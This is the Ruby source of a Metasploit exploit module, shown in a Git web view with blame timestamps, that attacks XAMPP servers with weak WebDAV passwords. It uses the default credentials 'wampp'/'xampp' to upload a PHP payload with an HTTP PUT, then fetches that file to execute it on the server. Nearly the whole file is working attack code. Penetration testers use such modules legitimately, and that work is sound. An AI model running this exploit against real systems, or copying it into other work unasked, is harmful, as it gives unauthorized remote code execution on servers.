metasploit-framework/modules/exploits/windows/http/xampp_webdav_upload_php.rb

81 lines
2.2 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = ExcellentRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
2013-08-30 21:28:54 +00:00
def initialize
super(
'Name' => 'XAMPP WebDAV PHP Upload',
'Description' => %q{
This module exploits weak WebDAV passwords on XAMPP servers.
It uses supplied credentials to upload a PHP payload and
execute it.
},
'Author' => ['theLightCosine'],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' =>
[
[ 'Automatic', { } ],
],
'DisclosureDate' => 'Jan 14 2012',
'DefaultTarget' => 0
)
2013-08-30 21:28:54 +00:00
register_options(
[
OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']),
OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]),
OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']),
OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp'])
], self.class)
end
2013-08-30 21:28:54 +00:00
def exploit
uri = build_path
print_status "Uploading Payload to #{uri}"
res = send_request_cgi({
'uri' => uri,
'method' => 'PUT',
'data' => payload.raw,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}, 25)
unless (res and res.code == 201)
print_error "Failed to upload file!"
return
end
print_status "Attempting to execute Payload"
res = send_request_cgi({
'uri' => uri,
'method' => 'GET'
}, 20)
end
2013-08-30 21:28:54 +00:00
def build_path
uri_path = normalize_uri(datastore['PATH'])
uri_path << '/' unless uri_path.ends_with?('/')
if datastore['FILENAME']
uri_path << datastore['FILENAME']
uri_path << '.php' unless uri_path.ends_with?('.php')
else
uri_path << Rex::Text.rand_text_alphanumeric(7)
uri_path << '.php'
end
return uri_path
end
end